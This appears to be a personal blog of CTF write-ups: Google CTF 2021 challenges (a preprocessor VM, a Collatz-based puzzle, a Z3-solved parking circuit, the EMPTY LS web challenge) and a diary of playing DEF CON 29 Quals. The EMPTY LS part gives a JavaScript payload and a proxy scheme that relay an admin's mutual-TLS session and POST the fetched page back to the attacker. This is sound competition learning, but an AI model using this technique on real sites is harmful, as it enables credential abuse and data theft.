#define B0
#undef  B1
#define B2
#undef  B3
#undef  B4
#define B5
#define B6
#define B7

If we consider B as a signed 8-bit number, then it is equivalent of setting B = 0b11100101 (-27).

With this knowledge, we can finally start out reversing process.

Continue where we left off:

24: I = 0
25: M = 0
26: N = 1
27: P = 0
28: Q = 0
29: B = -27
30: B += I as we just analyzed.

S == 31

#ifndef B0
  #ifndef B1
    #ifndef B2
      #ifndef B3
        #ifndef B4
          #ifndef B5
            #ifndef B6
              #ifndef B7
                #undef S
                #define S 56
              #endif
            #endif
          #endif
        #endif
      #endif
    #endif
  #endif
#endif

By our analysis above, this means that if B == 0, we will jump to instruction 56.

Therefore, instruction 31 is IF B == 0 THEN JMP 56.

32: B = 0x80
33: B += I, same as instruction 30

S == 34

There are two parts in this instruction, let’s check them out one by one:

#undef lx
#ifdef Bx
  #define lx 1
#else
  #define lx 0
#endif

for x ranging 0 to 7. It is easy to recognize that this is checking each bit of B, and set l_x to the literal value of 1 or 0.

The next part looks like this:

#if LD(l, x)
  #define Ax
#else
  #undef Ax
#endif

for x ranging 0 to 7. As we have analyzed before, LD(l, x) is the function to load MEM portion using address in l and the xth bit. The #if is to convert literal 0 and 1 in memory back to the bit representation (defined or undefined) in the program.

Take the above together, we see that this is a memory load operation, where it takes B as a memory address and set the resulting value to A. Therefore, instruction 34 is A = LOAD(B).

35: B = LOAD(I), similar to instruction 34.
36: R = 1
37: JMP 12

12: X = 1
13: Y = 0
14: IF X == 0 THEN JMP 22, similar to instruction 31.

S == 15

#ifdef Xx
  #define Zx
#else
  #undef Zx
#endif

for x ranging 0 to 7. It is easy to recognize that this is copying or assigning each bit of X to Z, so this is an equal operation. Instruction 15 is Z = X.

S == 16

#ifdef Zx
  #ifndef Bx
    #undef Zx
  #endif
#endif

for x ranging 0 to 7. From the syntax of it, we can see that Zx will be 0 when Bx is 0.

You can draw out a table for this, but I’ll cut to the chase…

Which means that this instruction is a bitwise-and operation, Z = Z & B.

17: IF Z == 0 THEN JMP 19
18: Y += A
19: X += X
20: A += A
21: JMP 14

22: A = Y
23: JMP 1

S == 1

#ifdef Rx
  #undef Rx
#else
  #define Rx
#endif

Should be pretty obvious that this is a bitwise-not, R = ~R.

2: Z = 1
3: R += Z
4: R += Z
5: IF R == 0 THEN JMP 38
6: R += Z
7: IF R == 0 THEN JMP 59
8: R += Z
9: IF R == 0 THEN JMP 59
10: #ERROR BUG
11: EXIT, as we talked about S == -1 means ending the program.

38: O = M
39: O += N
40: M = N
41: N = O
42: A += M
43: B = 0x20
44: B += I
45: C = LOAD(B)

S == 46

#ifdef Cx
  #ifdef Ax
    #undef Ax
  #else
    #define Ax
  #endif
#endif

Let’s draw a table for this:

Cx	Ax	Ax after
0	0	0
0	1	1
1	0	1
1	1	0

The remaining case when Cx is not set, Ax will keep unchanged. So we can say that

\[A_x = \begin{cases} A_x & \text{if}\ C_x=0 \\ \neg A_x & \text{if}\ C_x=1 \\ \end{cases} \implies A_x = A_x \oplus C_x\]

Meaning instruction 46 is exclusive-or operation, A ^= C.

47: P += A
48: B = 0x40
49: B += I
50: A = LOAD(B)
51: A ^= P, similar to instruction 46

S == 52

#ifndef Qx
  #ifdef Ax
    #define Qx
  #endif
#endif

Very similar to instruction 16, but this time we can see Qx will be 1 when Ax is 1, and otherwise unaffected.

Again you can draw out a table for this.

Which means that this instruction is a bitwise-or operation, Q = Q | A.

53: A = 1
54: I += A
55: JMP 29

56: IF Q == 0 JMP 58
57: #ERROR "INVALID FLAG"
58: EXIT

Rewrite the Program

Since we now have analyzed every single instruction of the program, let’s write a pseudo program for this:

I = 0                   // 24
M = 0                   // 25
N = 1                   // 26
P = 0                   // 27
Q = 0                   // 28

for {
  B = -27               // 29
  B = B + I             // 30
  if (B == 0) break;    // 31
  B = 0x80              // 32
  B = B + I             // 33
  A = LOAD(B)           // 34
  B = LOAD(I)           // 35
  R = 1                 // 36

  X = 1                 // 12
  Y = 0                 // 13
  for X != 0 {          // 14
    Z = X               // 15
    Z = Z & B           // 16
    if (Z != 0) {       // 17
      Y += A            // 18
    }                   // 19
    X += X              // 20
    A += A              // 21
  }
  A = Y                 // 22
  
  R = ~R                // 1
  Z = 1                 // 2
  R += Z                // 3
  R += Z                // 4
  if (R != 0) abort()   // 5 - 11 (won't reach here)
  
  O = M                 // 38
  O += N                // 39
  M = N                 // 40
  N = O                 // 41
  A += M                // 42
  B = 0x20              // 43
  B += I                // 44
  C = LOAD(B)           // 45
  A ^= C                // 46
  P += A                // 47

  B = 0x40              // 48
  B += I                // 49
  A = LOAD(B)           // 50
  A ^= P                // 51
  Q |= A                // 52
  A = 1                 // 53
  I += A                // 54
}

if (Q != 0) {           // 56
    "INVALID FLAG"      // 57
}

EXIT                    // 58

With some tidy up, and write it in Go, we get

var M uint8 = 0
var N uint8 = 1
var P uint8 = 0
var Q uint8 = 0

for I := uint8(0); I < 27; I++ {
    A := MEMORY(0x80 + I)
    B := MEMORY(I)

    var X uint8 = 1
    var Y uint8 = 0
    for X != 0 {
        if X&B != 0 {
            Y += A
        }
        X += X
        A += A
    }
    A = Y

    O := M + N
    M = N
    N = O

    A += M
    A ^= MEMORY(0x20 + I)
    P += A

    Q |= MEMORY(0x40+I) ^ P
}

if Q != 0 {
    fmt.Println("invalid flag")
}

Notice that R is gone. Since ~1 + 2 == 0 is for sure, we can optimize it out. Some of the intermediate variables are also optimized out.

Get the Flag

It is possible to figure out the logic behind the memory operations and try to extract the flag by reversing the process. However, with some observation, we see that the flag is identified as invalid when Q != 0 when the program ends. Looking at the entire program, Q is only calculated once here Q |= [some value]. By the property of the bitwise-or, any set bit will remain to be set. Therefore, in order for Q == 0 at the end, it must be that for each iteration of the loop, Q is kept at zero.

Also, the program processes flag string one byte by one byte, which means that, if at any iteration of the loop, Q is some value not 0, then that byte must be a faulty byte.

Using this knowledge, we are able to reduce the search space from $65^{27}$ to $65 \times 27$. The exploit then is to test out the string character one-by-one, and continue if Q is kept 0 during the loop.

The exploit can be found here: CPP, Google CTF 2021.

ICAN’TBELIEVEIT’SNOTCRYPTO

This is a pretty simple challenge, once you know what is going on.

So the question asks to give two lists l1 and l2, where l1 contains only 0 and 1, and l2 only contains 0, 1, and 2. The lists go through the function step() each time, and count() counts how many steps it will take for l1 and l2 to reach the state where l1 = [1] and l2 = [0]. The flag will be printed if it needs more than 2000 steps.

There are two constraints, namely that len(l1) == len(l2) and len(l1) < 24. So you can’t give a sufficiently large array to pass the test.

I spend a LOT of time on this and didn’t found the solution, only to found that this is a well-known and studied problem in disguise. It is actually the process described in Collatz conjecture. And l1 and l2 is just a simple conversion from a number to its base-6 form, and for each digit split across two lists. A simple conversion script looks like this:

def to_lists(num):
    l1 = []
    l2 = []
    while num:
        digit = num % 6
        l1.append(digit & 1)
        l2.append(digit >> 1)
        num //= 6
    return l1, l2

def from_lists(l1, l2):
    num, mul = 0, 1
    for i in range(len(l1)):
        digit = l1[i] | (l2[i] << 1)
        num += digit * mul
        mul *= 6
    return num

The starting value that has the largest total stopping time within the range of $6^{24} \approx 10^{18}$ is written on the Wikipedia page:

less than 10¹⁷ is 93571393692802302, which has 2091 steps […]

which is enough for the required 2000 steps. Therefore the exploit is simply something like this:

char = ord('f')
assert(char % 6 == 0)
l1, l2 = to_lists(93571393692802302)
str1, str2 = "", ""
for i in l1:
    str1 += chr(char + i)
for i in l2:
    str2 += chr(char + i)
print(str1)
print(str2)

Which gives us output string fggffgfgfggffffgffgggf and fgghfgghhhhhhghffgggfh. Input it and we get the flag.

It is very lucky that my teammates figured this out at then end, but not me. I was on a path of no-return: I tried to search the answer out.

The following is a record of what I did during the CTF, you will see that I was extremely close to the answer, both in my answer and method.

Reversible Function

So the step() function may not have a one-to-one relationship, but it’s definitely reversible.

First, we can determine that both lists will have the same length, and there are no 0s at the end of both lists, because they are stripped away. The problem is, how many 0 should we append, because there could be infinitely many such 0s that were stripped away. Don’t worry so fast, let’s ignore that for now and continue the analysis.

The SBOX is easily reversible because it obviously has an one-to-one relationship, so we could build a reverse mapping to convert the list back.

Notice this line l1.append(0), meaning l1 should have a 0 at the end. However, if we don’t have a 0 at the end of l1, then it must be that there are another 0 that was at the end of l2. So, we have something like this

if l1[-1] != 0:
    l1.append(0)
    l2.append(0)
l1.pop() # correspond to l1.append(0)

Here we only append one 0 to each end of the list, why only one? Notice that if we append more than 1 zeros, then this list is impossible to be the result of a single step(), as the tailing 0s are trimmed at the end of each step().

The for the final casing, we see that we could have two cases, one is that the original l1 begins with a 0, another is that l1 begins with an 1, and the resulting l2 begins with an 1. So we have

# possibility 1
ori_l1, ori_l2 = [0] + l1, l2     # correspond to l1.pop(0)

# possibility 2
if l2[0] == 1 and l1[0] == 1:
    ori_l1, ori_l2 = 1, l2[1:]    # correspond to l2.insert(0, 1)

Taken together, we have the reverse function as:

def reverse_step(l1, l2):
    if not l1 or not l2 or l1[-1] == l2[-1] == 0:
        return
    
    for i in range(len(l1)):
        l1[i], l2[i] = RBOX[(l1[i], l2[i])]
    
    if l1[-1] == 0:
        l1.pop()
    else:
        l2.append(0)
    
   	ret = [[0] + l1, l2]
    if l2[0] == 1 and l1 and l1[0] == 1:
        ret.append([l1, l2[1:]])
    return ret

Where RBOX is the reverse of SBOX.

Search.

So our search space is an incomplete binary tree (later to be found out called Collatz Graph). However, for a search depth more than 2000, there could be as many as $2^{2000}$ states, and even if we consider most of the branches are single links most of the time, the search space is still enormously huge for simple algorithms like breadth-first search, so it’s a no-go.

Depth-first search seems like a good idea. However, the list length is limited to 23, meaning that our DFS really is an IDDFS, and that it performs no better than BFS in this case. So we have to turn to something else. By the way, the longest path problem is a known NP-hard problem, although I’m not quite sure if this really is a longest path problem.

Trying a lot of things, finally settled on a heuristic priority-based parallelized searching algorithm with exploration. I know that sounds like a lot, but let me explain.

Heuristic

The easiest one to consider, which I tried first, is to simply rely on the count (stopping time): whichever node has the largest count will get searched first. That easily turned out to be really bad, because the search would stuck on some leaves of a branch in the tree that has no chance to grow bigger because of the length limitation.

Then I tried a lot of different functions based on count and another parameter, the length of the list (upper bound of the number). I intuitively thought that it must be better if we can get a sufficiently large count with small length, meaning it has much more potential to spread out without reaching the length limit.

Few things I tried:

\[\frac{\text{count}^{k_1}}{\text{length}^{k_2}}\]
\[\max\left(k_1 \frac{\text{count}}{2000}, k_2 \frac{\text{length}}{23}\right)\]
\[\log\text{count} \cdot \left(1-\frac{\text{length}}{23}\right)\]
\[k_1 \frac{\text{count}}{2000} - k_2 \frac{\text{length}}{23}\]

where $k_1$ and $k_2$ are some weights that I tweak by hand. All of them worked pretty well with manual tweaking, however, they all stopped around ~1300, which is still far from what we need.

Exploration

Thinking that the heuristic is not good enough, I also added an exploration factor $1 > p \gg 0$ into the game. Every time a new node is selected, the program will have a probability of $p$ to choose the top of the priority queue (i.e. with the largest heuristic), and a slight $1-p$ chance to choose something in the middle of the queue.

This exploration part is here for the hope that by some chance, the program will bump into the correct node which would lead us to victory. This “optimization” supposedly shouldn’t have a big impact to the overall dynamics of the search, but it is a way to improve the search anyhow.

Parallelization

Now time for multithreaded computing. This is actually pretty easy to code with Go’s built-in goroutine and sync.Cond. All I need is to boot up some worker goroutine, and use sync.Cond to notify the workers each time a new node is found. I left it running for some time, and restart it once its stuck for more than 5 minutes, hoping the above exploration mechanism would work. It did do some magic, though, as I was able to get lists with a large count.

It eventually stopped increasing more than 1636, and this is what I get at the end:

l1 = [0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0]
l2 = [0, 1, 0, 0, 0, 1, 0, 1, 1, 2, 2, 1, 1, 0, 2, 2, 1, 0, 0, 0, 2, 0, 2]

During the search process, in order to record the states, I turned the states into base-6 numbers already, but I just didn’t print them out to figure out what’s going on, what a sad story.

The codes I wrote is over here, very messy: number (gist).

PARKING

I didn’t actually solve this challenge during the match—my teammate did—but I did look into the question and found it pretty interesting. After the competition I tried to solve it myself. I think I found a “partially non-intended” way of solving this problem.

So this is a challenge that is marked as hardware, because the map level2 actually works like a circuit, where you can clearly identify the normal AND, OR and NOT gate. The intended way, which my teammate did at the end, is to extract the circuit out and solve it using a Boolean satisfiability problem solver like the famous Z3. A write-up that tells you how to do it was nicely written by User1@osogi from team s3qu3nc3, take a look!

However, with a closer inspection of the game level, I realized that even if we ignore the space taken away by other blocks, there is only a small number of moves each block can do. For example:

This is a region that contains a lot of blocks, but let’s only focus on one block and take away all other blocks. Now you can slide that block freely up and down (or left and right if the block lies horizontally). But no matter which block you choose, because of the rugged path, there is not many places you can go. Using this observation, we can set up the variables in a way, such that the z3 solver can do all the job for us.

For the following, $(x, y, w, h)$ is a non-wall block that has it upper-left corner at $(x,y)$ position with dimensions $(w, h)$, with a implicit requirement that $w = 1 \lor h=1$.

Variables

First thing to do is to turn the wall blocks into a boolean matrix $M$ of dimension $(\text{width}, \text{height})$, where $M_{x, y}$ is true if the position $(x,y)$ is covered by a wall block, and false otherwise.

Currently if you were to check if a block $(x, y, w, h)$ intersects with a wall or not, you’d have to spend $O(n)$ time every time, where $n$ is the number of wall blocks given. However, using $M$, it only takes $O(w\cdot h)$ time to do the check, which is much more efficient.

To further compress the space usage, we can use an 1-D bit-vector $S$ of size $\text{width}\cdot \text{height}$ for this, where $S_{x\cdot \text{height}+y} = M_{x, y}$.

With the help of this, we can quickly calculate all possible moves for each block, by sliding it up and down or left and right step-by-step until it hits the wall. We represent each move as an integer $i$, where a positive one meaning the block can move to its down or right by $i$ steps, a negative one meaning the block can move to its up or left by $-i$ steps, and zero means that the block can stay where it was at the beginning. Notice that all the blocks have zeros in their move set $D(b)$ (action domain), except for the red block, because the red block has to be moved at least by one step.

For example,

\[D(\text{red}) = \{-1, 0, 1, 2\}\\ D(\text{blue}) = \{-3, -2, -1, 0\}\\ D(\text{green}) = \{-1, 0\}\]

There are 320,768 non-wall blocks in total, and 1,002,421 possible movements for all blocks (stay at the original location also counts as one move), meaning that on average a block has 3.12 possible moves.

Notice that with each move, we “generated” a new block that could potentially exist on the final state of the board. If we have a block $b_i = (x, y, w, 1)$ and $D(b_i)=\{-1, 0\}$, on the final state of the board, there is a possibility that either $b_{i,0} = (x, y, w, 1)$ exists on the board, or $b_{i, -1} = (x-1, y, w, 1)$ exists on the board. Then, we can turn each of these indicators into boolean values, where $b_{i,0}$ is true represents that $b_{i,0}$ exists on the final state of the board, and false otherwise, so on and so forth.

I’ll abuse the notation a bit, so that a block symbol is a four-tuple and a bool value at the same time.

The given code encodes the final state $s_i$ of the green block $i$ as a single bit into the flag string, where the bit is a 0 if the block is not moved, and 1 if it is moved, which means it nicely converts to our representation, where $s_i = \neg b_{i, 0}$.

Constraints

First obvious constraint we need to set up is that

\[\forall b_i,\bigvee_{j\in D(b_i)} b_{i,j}\]

Using English, this means for all non-wall blocks on the board, one of their available “moved” version must exists on the board, because a block cannot be taken away from the board.

Then, we have the constraint that for each space $(i, j)$ on the board, it can only be occupied by at most one block. Therefore, if we have two blocks, $a$ and $b$, that intersect with each other, then it must be that $a \implies \neg b$ (abusing of notation again). Notice that this automatically implies $b \implies \neg a$, which means that we need only add one of them into the constraints.

To build these constraints, we need to find all kinds of intersections, and finding them in a normal $O(n^2)$ way will not do, because $n \approx 10^6$ which is too large for this. Notice that the actual number of the intersections exists $\ll 10^6$ because a block will only potentially intersects with a nearby block. Hence, the optimization we can do is to pre-calculate the spaces each block occupies, and then for each space, add constraint that only one block can occupy that space. A pseudo-code looks like this:

S := Map[(x, y) -> Set[Block]]

FOR b IN blocks
  FOR (i, j) that b covers
    add b to set S[i, j]
  END
END

FOR (i, j) in S
  FOR b_1 in S[i, j]
    FOR b_2 in S[i, j] \ {b_1}
      add constraint (b_1 => !b_2)
    END
  END
END

That’s it. Notice that we didn’t add the constraint that limits only one of the same block’s moved version exists on the board, that means it’s totally valid to assume there are two disjoint version of the same block is set to true by the solver at the end (something like both $b_{i, -2}$ and $b_{i, 2}$ are true). However, that won’t affect our final answer, as a block taking two places is very unlikely to happen because how tight the spaces are.

Finally we have in total 3,288,449 constraints and 1,002,421 variables, and it took z3 about 3 minutes to solve on my computer. The exploit can be found over here: Parking, Google CTF 2021.

EMPTY LS

Although I’m one of the web gangs, because there are too many interesting tasks this time, I didn’t even look at any of the web challenges. Empty LS is an exception because I heard the solution while my teammates talked about it. I think it’s a pretty creative challenge, so I want to write the solution here as well.

The challenge revolves around two domains, one is https://www.zone443.dev, a website to register accounts and custom sub-domains, and https://admin.zone443.dev, an “admin portal” and supposedly where we should get the flag.

The credential authentication for this website is unusual because it did not use the traditional username/password or cookies, but instead a process called mTLS, which stands for Mutual TLS. Basically what that means is when connecting to a server, the client also present a certificate that can achieve two things:

Validate the identity of the client, and
Use the certificate to encrypt the communication.

Unlike cookies or password, it is quite hard to steal the identity of the client using mTLS, because the private key is kept safe and the only way to get it is to somehow take control over the client’s machine. However, the client’s using the latest headless Chrome, so no more Chrome 0-days for us. Also there might be some vulnerabilities in the mTLS implementation, but since this is a web challenge not a crypto one, that possibility is also highly unlikely.

Observations

A few important observations are made:

https://admin.zone443.dev is behind a server that doesn’t validate Server Name Indication in TLS Client Hello and Host field in HTTP request, it only uses the client certificate for application-level credential purpose;
https://admin.zone443.dev is using a wildcard certificate with Subject Alternative Name including host *.zone443.dev;
We have total control over the sub-domain we applied for, including applying for a valid TLS certificate; and
By filling out sub-domain address into the feedback form, a headless Chrome will request our sub-domain with the admin’s certificate.

Combining 1 and 2, we realized that any TLS requests will be accepted by the server. And using 3 and 4, it is possible to obtain a copy of admin’s TLS handshake and the following communication.

There are some other hints that the challenge gives, which is when you try to access admin.zone443.dev with your own client certificate that you applied for, a message will tell you that you are not authorized. Therefore, it must be that only when we access the website with the admin’s client cert, we shall get the flag.

There is clearly some Man-in-the-Middle attack going on. A replay attack won’t work as the TLS’s cipher key is generated randomly each time. However, notice that the website is accessed using a headless Chrome, meaning that it should also be executing anything ranging from iframe to script on our controlled sub-domain.

Exploit

Embedding a JavaScript that fetches the content of admin.zone443.dev on our controlled site using admin’s cert seems to be a good idea, but it is impossible to steal the content because of the Cross-Origin Resource Sharing policy. However, CORS enforces this by checking the domain name on the client site, is there a way to circumvent this protection?

This is a scenario that is very like DNS rebinding, where we have to trick the client into thinking it’s accessing the same domain name, so no CORS in effect, but in fact it’s using its credentials on another website.

Notice that we have control over the entire sub-domain, and that the admin. site doesn’t validate SNI nor Host, meaning we can set up a proxy in the back-end that redirects anything sent from the client to admin.zone443.dev:443 and back. Although we aren’t able to intercept anything of the actual communication because of TLS encryption, we can acquire the content in the front-end and send the data back to ourselves.

That means we can first make the admin access our controlled sub-domain https://xxx.zone443.dev/, so that it will execute a JavaScript payload on our website. The payload looks something like this:

fetch(new Request('/')).then(resp => resp.text()).then(body =>
    return fetch(new Request('/', {
        method: "POST",
        body: body,
    }));
});

This script will try to fetch the content on the same domain name https://xxx.zone443.dev/, but as we set up a proxy already, the request is actually sent over to admin.zone443.dev:443 and back. Then the acquired content will be send again back to our server via a POST request, where we will be able to see what the content on the admin. is like to the admin’s side.

In the actual payload, we can keep track of the TCP requests made, so on the first and third request, we use our own TLS cert and server to handle the request, but on the second request, we will redirect the address to admin. so that the content can be stolen. Notice that this is not as time-sensitive as a normal DNS rebinding would be, as there is no “caching” mechanism for TLS connections. Although potentially HTTP2 Multiplexing might affect the result, I didn’t really encounter that in my exploit, and it can be easily mitigated by closing the connection on the server side.

The exploit is easy to write with the help of Go’s built-in tls and http packages.

The exploit is over here EMPTY LS, Google CTF 2021. It is not host dependent, so you can simply run it without changing anything (other than to put X.509 cert/key pair in the right place).

My First CTF Experience

2021-05-04T10:30:00-04:00

I was one of the Tea Deliverers at DEF CON 29 CTF Quals.

I had the luck to play in this famous CTF event with some of the best hackers out there, and I definitely couldn’t miss this opportunity even though it’s a 5-day vacation here in China for the International Workers’ Day.

This is NOT a write-up NOR a blog for a general viewer, but merely a record of what I did and what I thought about this first ever CTF I’ve done.

0x00

I honestly had no idea who I was going to work with before the event. I was simply asked by my supervisor during my internship at Chaitin if I want to be in a CTF team, and I said yes. Later I was connected to @zTrix, the CTO of the company, and later joined a team that is called Tea Deliverers, which is obviously one the best CTF teams in the entire world.

Fun fact, the company founders got to know each other at CTF events, and they founded this security company together because of their experiences as teammates.

I signed myself in to be one of the “web gangs,” and told the group leader I am probably good at XSS (although I have probably done more binary reversing than XSS, both I’m not good at). Spoiler alert, only later to found out that there’s practically no web questions in this CTF, sad.

We had a fancy dinner the eve before the match at a seafood/hotpot/BBQ buffet place, which is pretty notable cause who doesn’t like free food.

The competition starts at 8 AM China local time, and lasts for 48 hours non-stop, so I better get some good sleep.

Day 1

I arrived at our “base,” which is just an office room in the company, slightly after the release of the first challenge, say-hellooo.

say-hellooo

8:00 AM

This challenge simply asks to call the event host @Zardus and ask for the flag. Finding the phone number was rather easy, by going to the host’s twitter, where he links his personal website, and where his CV can be found. On his CV there’s his phone number. I called over and after some chitchat, he said that the flag is “hellospacehackers, all lower case.” And…… it’s not correct.

But of course it is correct, only I was stupid to not realize that when he said “space” it refers to the whitespace instead of the word. After reminded by my teammate, I got the first flag for the team, and spoiler alert, my only flag during the event.

baby-a-fallen-lap-ray

8:05 AM

Although I didn’t sign-up for a pwn question, and I practically had no pwn experiences ever other than some basically stack overflow knowledge, I still took a look at the challenge and tried to find out what this is about, since this challenge is the only one released at the time.

Inside the package there is one executable in elf format, which is the entry point to the service, called manchester, and a few binaries that starts with the magic header sephiALD, and a mysterious file p that contains strings of the menu when we connect to the server.

There was one link that points to the source code of a challenge in the previous year’s DEF CON Finals, and it’s seemingly the same thing, where manchester is actually an implementation of a Manchester dataflow machine. Thought that someone must have a disassembler since this question comes from a previous year, but I can’t find any. So I think it might be a good idea to start with a disassembler using the assmbler.py provided.

Firstly it is easy to build an unpacker and disassembler, but it is a bit confusing to change the raw operations into the forms of a .tass file, mainly I couldn’t figure out how the arguments work. One teammate who has read the paper walked me through how parallelism and dataflow works in this machine, and I was able to get a grasp on the idea. Yet recover the assembled binary back into human readable .tass might still be to much for me.

Teammates who are reversing this tells me that the opcodes and some internal structures are switched, however they are able to quickly figure out the new opcodes are and updated the table. Also they figured out that the mysterious file p was ran by the vm, and vm was ran by the manchester, so figuring out how manchester works was the first step, and we still had to reverse vm and then reverse p and pwn p.

Noticed that there was a graphing function to draw a dataflow of the program. With my current disassembler I could use that function to draw out a graph. However it was simply way too large and makes no sense at all.

I unfortunately has no other good ways to continue this problem, so I hand over my code to my teammates and worked on other problems.

nooombers

11:30 AM

I took a look at the challenge while doing baby-a-fallen-lap-ray, and people somehow just miraculously figure out what each operation mean. After some conversation I still don’t get how they manage to figure that out, probably by comparing it against common signature algorithms, or just eyeballing. Didn’t know what was happening so I left the challenge.

exploit-for-dummies

4:40 PM

Trivia, but definitely not trivial. The trivia part was rather easy, there were only 25 questions and you didn’t need to get all of them in order to pass the 5000 score mark. The flag was read into the memory but at a random mmapped location with a random offset. These two addresses are erased from the stack, but there was one number that equals to the offset xoring some random numbers that were stored both on stack and heap.

If we manage to crash the program, the front-end will spin up a gdb, and we can input an address that starts with 0x and gdb will print out a string located at that place. Nonetheless, it is definitely impossible to guess plainly of where the string is stored at.

My first intuition was there might be some exploits in that version of gdb, and we could write something using the save mechanism of the trivia game to pwn gdb. After some discussions with the teammates, we all agreed on that we should focus on gdb because there seemed to not have any bugs in that trivia game other than that file handle close crash.

After some play with gdb, I was able to get the address of the aforementioned number using 0x0+environ trick. However I got stuck because there were seemingly nothing I can do anymore. Written to core file is not an option as a crash would simply overwrite it.

Teammates found out some files that gdb would go and read, including iofclose.c, .gdb_history, and trivia.debug. But weirdly all of us couldn’t figure out how this relates to shellcoding. I unfortunately lost interest in this challenge, so I went on with the new challenges.

rick

10:00 PM

Two hours since the release of the problem with no significant progress made by my teammates. I jumped in to see where we at.

Level 1

I opened the OpenGL game, and there was one big building, a lever and a strange black cube that fell into the ground, with “Level 1” written on the corner of the program window. I played around and figured out the basic controls. I peeked into the door crack and saw there’s a yellow lever inside, so it must be that we need to enter the building.

Having wireshark in the background, I also see that the game connects to the server when it starts but sent nothing to the server. And the server will automatically disconnect with KO after 15 seconds.

Still, didn’t want to touch Ghidra and IDA, I used scanmem to try to find the variables that controlled the player coordinates. However I was not able to find the exact variable, and I could only filter down to ~50 locations in memory. Setting them all at once apparently breaks the game.

One of my teammates was pretty smart and point out we could just go and look the cross-references to gluLookAt, since it calculates the transformation matrix for the camera. Indeed I found six helper functions that get the eye coordinates and the look vector. Using gdb to set the value was way too much of a hassle, so I wrote a frida script that intercepts one of the functions, print and change the values at my will.

Teleported into the building just to see a giant rick roll (which is what I anticipated seeing rick as the title of the challenge). The image had Rick Astley saying “Don’t Cheat,” and apparently teleporting was not an option. Somehow I thought it might be that the clue is hidden in the textures, that if you manage to open the door without cheating another image would appear. So I dumped all the textures just to find nothing there.

Then there were teammates figuring out that the button ‘E’ does something, by back-tracing from the call to send, and observed there were some conditions needed to be met in order to enter the function that sends something to the server. I simply hooked that function to let it always return 1, and whoosh the door opens, with the lever and block outside turns white, but nothing else happened.

Further reversing of the function revealed that it go through all the levers in the map and checks if the player is in the bounding box of something. Returns 1 if it indeed is. However there were some other things done in the function that simply hooking this function will not do. I therefore hooked into the actual low level checking function. And boom, I was in level 2.

Level 2~9

Didn’t know what happened, but wireshark told me that an interaction with the server had been done. It was not too long after that that we finally figure out that you can simply press ‘E’ on the levers to trigger them. Being a gamer for so long not realizing that, I was disappointed in myself.

Able to manually fly through the first 6 levels as a gaming boi within 15 seconds each level, starting from 7 there were too many levers to do manually. So I wrote some script to automate the process, with hardcoded levers to press.

Level 10

And then I arrived at level 10, where I realized that the logic is random each time you play it. I, because the lack of experience, thought that this must be the final level, cause it’s different from the rest.

Still didn’t want to do much work because I was pretty tired at that time, I figure out one combination of levers that would work to pass level 10, and just put my script there running, hoped that by randomization it would be sooner or later that this combination works again.

And indeed it worked, only that I was met by level 11.

Level 11~37

Okay, it’s time to fuzz, I thought. While others were still reversing the protocol, I started to write my algorithm to automatically switch the levers at random, and see if the door opens. I first let each lever has a certain probability $p$ to be on, but the effect is not so good and only gets me through the first 17 levels. Later by observation I realized only the lower end of levers are constantly being switched and not the higher-indexed ones. Then I realized that since each function only detects the lever once, each lever actually has no equal probability of being switched, but it’s rather a geometric distribution.

Tried a lot of ways to fix, including generating a random number that represents 1 and 0s of the lever, and also tried to fix the probability by giving each of them different Bernoulli distribution and see how it goes. Finally I settled down on a way which recorded the index of the last lever being pulled, to make sure that each lever has the chance of being pulled at least once. And check the state of the final gate to make sure we get to the next level as soon as we have an acceptable answer. I also play around with different probability distribution because apparently there were some levels that requires a lot of levers being pulled and some requires less.

I also optimizes a lot of other things. I first teleport around to press the levers, only to realize that was pretty inefficient. Later I simply had the ‘E’ hold down for all the time and tell the function to return true at my intended lever index, by keeping an internal counter. I also hooked glutSetTimer to make the arguments being 0 so each refresh is way quicker and a lot more trials can be done within 15 minutes.

Level 37~100

I was able to get to the 37th level, but no further progresses can be made by fuzzing. I kind of already know that this should be using a CSP or BSP solver, because LiveOverflow once done a challenge that was pretty similar to this. In the meanwhile, my fellow teammates finally reversed the protocol and realize that it is simply a tree structure that goes from the levers to the final gate. So all they have to do is to write the exploit now.

At 6:45 AM the second day, we got the flag.

Day 2

There were still no web questions released, so I took a look at various questions.

pza999

6:50 AM

Downloaded the package, just to realize there’s another QEMU VM kernel image. Have no idea what to do.

segnalooo

7:00 AM

Another pwn. The reversing part seemed straightforward, and the input seemed to take in a hex number. I tried “0000” locally and it goes through to the next line of output, but when I tried the same on the server it says “invalid hex,” and won’t let me proceed. Again didn’t what to do next.

After less than 3 hours of sleep, I woke up from a camp bed at 9:30 AM, and jumped back to work.

coooinbase

9:40 AM

src is actually a .gz file, after decompression there were a .html the front end, a .rb the backend and .sh which runs the QEMU VM. The front-end takes input and feed into the ruby backend, the backend check conditions on the input and bson→base64 encoded it, and fed it into the virtual machine. However, I had no idea how to statically analyze the kernel image (it’s not an elf), and I’m not a pwn technician, so I can do really no help here.

smart-cryptooo

10:30 AM

Challenge was tagged machine learning and easy, seems suitable for a noob like me. Trained the model for some time and was able to encrypt and decrypt custom message successfully. The file name indicates that the original text was from philosophy.html in OOO’s website. Certainly there were more to it.

After taking a look at the python file, it was pretty easy to figure out the entire encryption and decryption process, and how the models are trained. The default message and key size are 64 bits, where one bit is actually a float64 number, and we’ll use these numbers from now on.

Alice and encryption

Alice is a 4-layer model that encrypts a message with a key. It takes in a plain text message (1×64 vector) and a key (1×64 vector), and outputs the encrypted message (1x64 vector). The encryption procedure of an entire text goes like this:

First split the text into groups of 8-byte message, use space to pad the end. Then each 8-byte message gets converted into a big-endian 64-bit number. Each message then will be converted into a 1×64 feature vector, where one bit corresponds to one feature, and if the bit is a 1, the feature is a -1, otherwise the feature is a 1. Every 16 (bunch_size) messages will be grouped into a bunch, and encrypt using the same key by putting these 16 messages alongside with the key into the Alice model. A random 8-byte (64-bit) key will also be generated to use to encrypt the next bunch of messages. And this randomly generated key will be encrypted with the current key and be appended to the current bunch of encrypted messages.

Bob and decryption

The Bob model has exactly the same structure as Alice. The only difference is that it functionally takes in an encrypted message and that key that was used to encrypt it, and outputs the decrypted message. The decryption procedure is the reverse of the above procedure by using the bob model, nothing special.

The magic Eve

How to prevent the model just being lazy and don’t encrypt at all? That’s when the eve model steps in. So the Eve is identically to the Alice and Bob model, excepts that it has new input layer before the original input layer, where it takes in only the encrypted message and densely connected it to the original input layer. Now we define the loss of the eve model as the absolute difference between the output of the eve model and the corresponding plain message, meaning that if we could train eve model to have a small loss, then we would be “breaking” the encryption.

ABE model

